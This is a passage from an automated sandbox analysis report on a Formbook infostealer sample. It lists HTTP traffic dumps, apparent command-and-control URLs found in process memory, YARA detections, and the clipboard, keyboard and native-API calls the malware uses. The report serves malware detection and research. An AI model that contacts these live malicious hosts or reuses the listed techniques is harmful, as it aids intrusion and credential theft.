2d 65 72 72 6f 72 5f 5f 69 6d 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 5f 5f 6d 65 73 73 61 67 65 22 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 a1 a3 3c 62 72 3e 0a 20 20 20 20 20 20 33 30 c9 c3 b8 e5 a4 cb a5 b7 a5 e7 a5 c3 a5 d7 a5 da a1 bc a5 b8 a4 d8 c5 be c1 f7 a4 b7 a4 de a4 b9 a1 a3 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 54 4f 50 a5 da a1 bc a5 b8 3c 2f 61 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 72 65 64 69 72 65 63 74 28 29 22 2c 20 33 30 30 30 30 29 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 64 69 72 65 63 74 28 29 7b 0a 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 22 3b 0a 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:40:24 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:40:27 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:40:29 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:40:32 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:40:38 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 12947Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd b2 eb 72 e3 c6 92 2d fc db 7a 8a 6a 76 d8 22 6d 16 78 a7 24 48 94 67 b6 2f e7 78 62 7b db e1 b6 67 62 c2 ed e8 28 02 09 a0 5a 85 2a ec aa 02 29 36 47 bf ce 53 9c 5f e7 15 bf 47 f8 b2 00 90 a2 28 50 54 eb ba db 16 01 54 65 ae 5c b9 d6 3a 7b f3 fd 2f df fd fe df bf fe 40 12 9b 8a f3 83 33 f7 20 82 c9 78 d2 00 49 ff 78 d7 70 67 c0 c2 f3 83 2f ce 52 b0 8c 04 09 d3 06 ec a4 f1 c7 ef 3f d2 e3 06 e9 ac 6f 24 4b 61 d2 98 71 98 67 4a db 06 09 94 b4 20 b1 72 ce 43 9b 4c 42 98 f1 00 68 f1 d1 26 5c 72 cb 99 a0 26 60 02 26 bd 02 67 03 e6 50 ab a9 b2 e6 70 0d 72 98 b2 4b ca 53 16 03 cd 34 b8 21 be 60 3a 86 c3 a2 d1 72 2b e0 fc 57 bc 25 52 59 12 a9 5c 86 e4 ab b7 c7 fd 5e ef 94 fc 4d 09 fc 60 69 76 4a 7e d5 60 ed 82 fc c2 0c 37 67 9d b2 eb e0 4c 70 79 41 34 88 c9 61 28 8d 83 8f c0 06 c9 21 49 f0 6d 72 d8 e9 a4 2a 4d 17 a9 0a c1 33 dc 56 13 d7 3d 0d 26 2c 68 c9 2c 34 88 5d 64 a8 00 cb 32 c1 03 66 b9 92 1d 6d cc 37 97 a9 c0 2b 37 6b d2 d8 c1 85 7c a5 d9 3f 73 75 4a 7e 04 08 1b e5 e0 46 62 6d 66 fc ed f1 9d 08 4b 3a 8d e7 24 f1 1d 0e 44 cd cd 7d d8 04 55 ed 26 2d 13 68 9e d9 f3 83 39 97 a1 9a 7b 1f e6 19 a4 ea 23 7f 87 a3 b8 8c 0d 99 90 65 63 ca 0c fc a1 45 c3 af 80 df 77 de 77 8c 37 f7 94 8e df 77 0a 9f cd 7b 04 d7 f0 be 53 34 bf ef f4 46 5e d7 1b bc ef 1c f5 2f 8f fa ef 3b 8d 76 03 2e 2d f6 7b 99 8c f1 c3 cc e2 87 e1 61 63 81 86 cf 1f 4a 40 7c 73 df 2a d7 01 34 fc 65 03 33 88 4a 16 6d 15 7e 01 7f 53 89 f7 9d 79 46 b9 0c 44 1e ba 51 1f 4d 71 50 34 51 b4 08 70 5f 2f e5 d2 fb 68 be 9d 81 9e 8c bd b1 d7 6f 5c 5d 9d 1e 74 be 7e 43 7e 4f 50 fe 88 0b 20 f8 64 b9 55 34 06 09 1a 87 86 e4 eb ce c1 9b 28 97 81 b3 b2 c9 db b2 b5 9c 31 4d 54 db b4 e1 74 75 4e 82 26 b4 96 56 2f 8a 3b 3b 59 9a 3c cb 94 b6 bf 83 b1 c6 87 b6 e5 29 be a1 e3 7e 53 c2 9c 7c 8f c0 2d 6f c6 44 0e bf 44 cd d6 d5 a9 01 63 10 e6 9d 55 1a 95 f2 0c d8 9f 70 df a6 6a ff c7 bb 5f fe e1 19 ab d1 37 1e 2d 9a b6 d5 ba 42 29 82 c4 8d bb ba 5a 8f cf 9a 38 c3 51 03 2f c0 55 f5 6f 10 d8 66 b7 dd 6d e3 37 93 33 86 4e f0 d0 26 d7 9f 09 f0 38 b1 2d 3c c0 ad c5 ef e8 64 d3 62 79 b7 75 5a 2e e0 58 fe c1 a5 1d f4 ff 5d 6b b6 68 82 17 23 27 67 23 72 67 f7 81 f6 42 2c 6c b5 f5 a4 f9 Data Ascii: r-zjv"mx$Hg/xb{gb(Z*)6GS_G(PTTe\:{/@3 xIxpg/R?o$KaqgJ rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:40:40 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 12947Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd b2 eb 72 e3 c6 92 2d fc db 7a 8a 6a 76 d8 22 6d 16 78 a7 24 48 94 67 b6 2f e7 78 62 7b db e1 b6 67 62 c2 ed e8 28 02 09 a0 5a 85 2a ec aa 02 29 36 47 bf ce 53 9c 5f e7 15 bf 47 f8 b2 00 90 a2 28 50 54 eb ba db 16 01 54 65 ae 5c b9 d6 3a 7b f3 fd 2f df fd fe df bf fe 40 12 9b 8a f3 83 33 f7 20 82 c9 78 d2 00 49 ff 78 d7 70 67 c0 c2 f3 83 2f ce 52 b0 8c 04 09 d3 06 ec a4 f1 c7 ef 3f d2 e3 06 e9 ac 6f 24 4b 61 d2 98 71 98 67 4a db 06 09 94 b4 20 b1 72 ce 43 9b 4c 42 98 f1 00 68 f1 d1 26 5c 72 cb 99 a0 26 60 02 26 bd 02 67 03 e6 50 ab a9 b2 e6 70 0d 72 98 b2 4b ca 53 16 03 cd 34 b8 21 be 60 3a 86 c3 a2 d1 72 2b e0 fc 57 bc 25 52 59 12 a9 5c 86 e4 ab b7 c7 fd 5e ef 94 fc 4d 09 fc 60 69 76 4a 7e d5 60 ed 82 fc c2 0c 37 67 9d b2 eb e0 4c 70 79 41 34 88 c9 61 28 8d 83 8f c0 06 c9 21 49 f0 6d 72 d8 e9 a4 2a 4d 17 a9 0a c1 33 dc 56 13 d7 3d 0d 26 2c 68 c9 2c 34 88 5d 64 a8 00 cb 32 c1 03 66 b9 92 1d 6d cc 37 97 a9 c0 2b 37 6b d2 d8 c1 85 7c a5 d9 3f 73 75 4a 7e 04 08 1b e5 e0 46 62 6d 66 fc ed f1 9d 08 4b 3a 8d e7 24 f1 1d 0e 44 cd cd 7d d8 04 55 ed 26 2d 13 68 9e d9 f3 83 39 97 a1 9a 7b 1f e6 19 a4 ea 23 7f 87 a3 b8 8c 0d 99 90 65 63 ca 0c fc a1 45 c3 af 80 df 77 de 77 8c 37 f7 94 8e df 77 0a 9f cd 7b 04 d7 f0 be 53 34 bf ef f4 46 5e d7 1b bc ef 1c f5 2f 8f fa ef 3b 8d 76 03 2e 2d f6 7b 99 8c f1 c3 cc e2 87 e1 61 63 81 86 cf 1f 4a 40 7c 73 df 2a d7 01 34 fc 65 03 33 88 4a 16 6d 15 7e 01 7f 53 89 f7 9d 79 46 b9 0c 44 1e ba 51 1f 4d 71 50 34 51 b4 08 70 5f 2f e5 d2 fb 68 be 9d 81 9e 8c bd b1 d7 6f 5c 5d 9d 1e 74 be 7e 43 7e 4f 50 fe 88 0b 20 f8 64 b9 55 34 06 09 1a 87 86 e4 eb ce c1 9b 28 97 81 b3 b2 c9 db b2 b5 9c 31 4d 54 db b4 e1 74 75 4e 82 26 b4 96 56 2f 8a 3b 3b 59 9a 3c cb 94 b6 bf 83 b1 c6 87 b6 e5 29 be a1 e3 7e 53 c2 9c 7c 8f c0 2d 6f c6 44 0e bf 44 cd d6 d5 a9 01 63 10 e6 9d 55 1a 95 f2 0c d8 9f 70 df a6 6a ff c7 bb 5f fe e1 19 ab d1 37 1e 2d 9a b6 d5 ba 42 29 82 c4 8d bb ba 5a 8f cf 9a 38 c3 51 03 2f c0 55 f5 6f 10 d8 66 b7 dd 6d e3 37 93 33 86 4e f0 d0 26 d7 9f 09 f0 38 b1 2d 3c c0 ad c5 ef e8 64 d3 62 79 b7 75 5a 2e e0 58 fe c1 a5 1d f4 ff 5d 6b b6 68 82 17 23 27 67 23 72 67 f7 81 f6 42 2c 6c b5 f5 a4 f9 Data Ascii: r-zjv"mx$Hg/xb{gb(Z*)6GS_G(PTTe\:{/@3 xIxpg/R?o$KaqgJ rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:40:43 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 12947Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd b2 eb 72 e3 c6 92 2d fc db 7a 8a 6a 76 d8 22 6d 16 78 a7 24 48 94 67 b6 2f e7 78 62 7b db e1 b6 67 62 c2 ed e8 28 02 09 a0 5a 85 2a ec aa 02 29 36 47 bf ce 53 9c 5f e7 15 bf 47 f8 b2 00 90 a2 28 50 54 eb ba db 16 01 54 65 ae 5c b9 d6 3a 7b f3 fd 2f df fd fe df bf fe 40 12 9b 8a f3 83 33 f7 20 82 c9 78 d2 00 49 ff 78 d7 70 67 c0 c2 f3 83 2f ce 52 b0 8c 04 09 d3 06 ec a4 f1 c7 ef 3f d2 e3 06 e9 ac 6f 24 4b 61 d2 98 71 98 67 4a db 06 09 94 b4 20 b1 72 ce 43 9b 4c 42 98 f1 00 68 f1 d1 26 5c 72 cb 99 a0 26 60 02 26 bd 02 67 03 e6 50 ab a9 b2 e6 70 0d 72 98 b2 4b ca 53 16 03 cd 34 b8 21 be 60 3a 86 c3 a2 d1 72 2b e0 fc 57 bc 25 52 59 12 a9 5c 86 e4 ab b7 c7 fd 5e ef 94 fc 4d 09 fc 60 69 76 4a 7e d5 60 ed 82 fc c2 0c 37 67 9d b2 eb e0 4c 70 79 41 34 88 c9 61 28 8d 83 8f c0 06 c9 21 49 f0 6d 72 d8 e9 a4 2a 4d 17 a9 0a c1 33 dc 56 13 d7 3d 0d 26 2c 68 c9 2c 34 88 5d 64 a8 00 cb 32 c1 03 66 b9 92 1d 6d cc 37 97 a9 c0 2b 37 6b d2 d8 c1 85 7c a5 d9 3f 73 75 4a 7e 04 08 1b e5 e0 46 62 6d 66 fc ed f1 9d 08 4b 3a 8d e7 24 f1 1d 0e 44 cd cd 7d d8 04 55 ed 26 2d 13 68 9e d9 f3 83 39 97 a1 9a 7b 1f e6 19 a4 ea 23 7f 87 a3 b8 8c 0d 99 90 65 63 ca 0c fc a1 45 c3 af 80 df 77 de 77 8c 37 f7 94 8e df 77 0a 9f cd 7b 04 d7 f0 be 53 34 bf ef f4 46 5e d7 1b bc ef 1c f5 2f 8f fa ef 3b 8d 76 03 2e 2d f6 7b 99 8c f1 c3 cc e2 87 e1 61 63 81 86 cf 1f 4a 40 7c 73 df 2a d7 01 34 fc 65 03 33 88 4a 16 6d 15 7e 01 7f 53 89 f7 9d 79 46 b9 0c 44 1e ba 51 1f 4d 71 50 34 51 b4 08 70 5f 2f e5 d2 fb 68 be 9d 81 9e 8c bd b1 d7 6f 5c 5d 9d 1e 74 be 7e 43 7e 4f 50 fe 88 0b 20 f8 64 b9 55 34 06 09 1a 87 86 e4 eb ce c1 9b 28 97 81 b3 b2 c9 db b2 b5 9c 31 4d 54 db b4 e1 74 75 4e 82 26 b4 96 56 2f 8a 3b 3b 59 9a 3c cb 94 b6 bf 83 b1 c6 87 b6 e5 29 be a1 e3 7e 53 c2 9c 7c 8f c0 2d 6f c6 44 0e bf 44 cd d6 d5 a9 01 63 10 e6 9d 55 1a 95 f2 0c d8 9f 70 df a6 6a ff c7 bb 5f fe e1 19 ab d1 37 1e 2d 9a b6 d5 ba 42 29 82 c4 8d bb ba 5a 8f cf 9a 38 c3 51 03 2f c0 55 f5 6f 10 d8 66 b7 dd 6d e3 37 93 33 86 4e f0 d0 26 d7 9f 09 f0 38 b1 2d 3c c0 ad c5 ef e8 64 d3 62 79 b7 75 5a 2e e0 58 fe c1 a5 1d f4 ff 5d 6b b6 68 82 17 23 27 67 23 72 67 f7 81 f6 42 2c 6c b5 f5 a4 f9 Data Ascii: r-zjv"mx$Hg/xb{gb(Z*)6GS_G(PTTe\:{/@3 xIxpg/R?o$KaqgJ rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V
Source: RmClient.exe, 00000005.00000002.4591201110.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.000000000498C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://mommymode.site/hya5/?ntHx=DVDDWR70P4Ux&nV=kBImd3s/QyLjHyq4SLIoEPo9gYVaCCo4aEwkxNbGH3XUM96sRoR
Source: RmClient.exe, 00000005.00000002.4591201110.0000000003FDE000.00000004.10000000.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.0000000003E8E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://nakama2-sshl.xyz/ui3j/?nV=Ezegw1wupX22aLPkoEEv7/ZO5DjzGXXdsNrfcd
Source: RmClient.exe, 00000005.00000002.4591201110.0000000003804000.00000004.10000000.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.00000000036B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2664524956.0000000000AC4000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://newdaydawning.net/7mju/?ntHx=DVDDWR70P4Ux&nV=n/a1XNlERIMSMkzeywaNMrPIuUD1rrysoFUi8ENskqLMFqSk
Source: avmjQSNkeFbUoa.exe, 00000006.00000002.4591962813.000000000575F000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.polarmuseum.info
Source: avmjQSNkeFbUoa.exe, 00000006.00000002.4591962813.000000000575F000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.polarmuseum.info/nuqv/
Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RmClient.exe, 00000005.00000002.4591201110.0000000003B28000.00000004.10000000.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: RmClient.exe, 00000005.00000002.4588947900.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: RmClient.exe, 00000005.00000002.4588947900.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: RmClient.exe, 00000005.00000002.4588947900.000000000098A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desdL
Source: RmClient.exe, 00000005.00000002.4588947900.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: RmClient.exe, 00000005.00000002.4588947900.000000000098A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: RmClient.exe, 00000005.00000002.4588947900.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: RmClient.exe, 00000005.00000002.4588947900.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: RmClient.exe, 00000005.00000003.2554231384.00000000078A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: RmClient.exe, 00000005.00000002.4591201110.0000000004C6E000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000005.00000002.4593050924.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.0000000004B1E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_0045A10F
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_0045A10F
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard, 0_2_0046DC80
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput, 0_2_0044C37A
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0047C81C

E-Banking Fraud

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042C433 NtClose, 2_2_0042C433
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672B60 NtClose,LdrInitializeThunk, 2_2_03672B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_03672DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_03672C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk, 2_2_036735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03674340 NtSetContextThread, 2_2_03674340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03674650 NtSuspendThread, 2_2_03674650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672BE0 NtQueryValueKey, 2_2_03672BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672BF0 NtAllocateVirtualMemory, 2_2_03672BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672BA0 NtEnumerateValueKey, 2_2_03672BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672B80 NtQueryInformationFile, 2_2_03672B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672AF0 NtWriteFile, 2_2_03672AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672AD0 NtReadFile, 2_2_03672AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672AB0 NtWaitForSingleObject, 2_2_03672AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672F60 NtCreateProcessEx, 2_2_03672F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672F30 NtCreateSection, 2_2_03672F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672FE0 NtCreateFile, 2_2_03672FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672FA0 NtQuerySection, 2_2_03672FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672FB0 NtResumeThread, 2_2_03672FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672F90 NtProtectVirtualMemory, 2_2_03672F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672E30 NtWriteVirtualMemory, 2_2_03672E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672EE0 NtQueueApcThread, 2_2_03672EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672EA0 NtAdjustPrivilegesToken, 2_2_03672EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672E80 NtReadVirtualMemory, 2_2_03672E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672D30 NtUnmapViewOfSection, 2_2_03672D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672D00 NtSetInformationFile, 2_2_03672D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672D10 NtMapViewOfSection, 2_2_03672D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672DD0 NtDelayExecution, 2_2_03672DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672DB0 NtEnumerateKey, 2_2_03672DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672C60 NtCreateKey, 2_2_03672C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03672C00 NtQueryInformationProcess, 2_2_03672C00
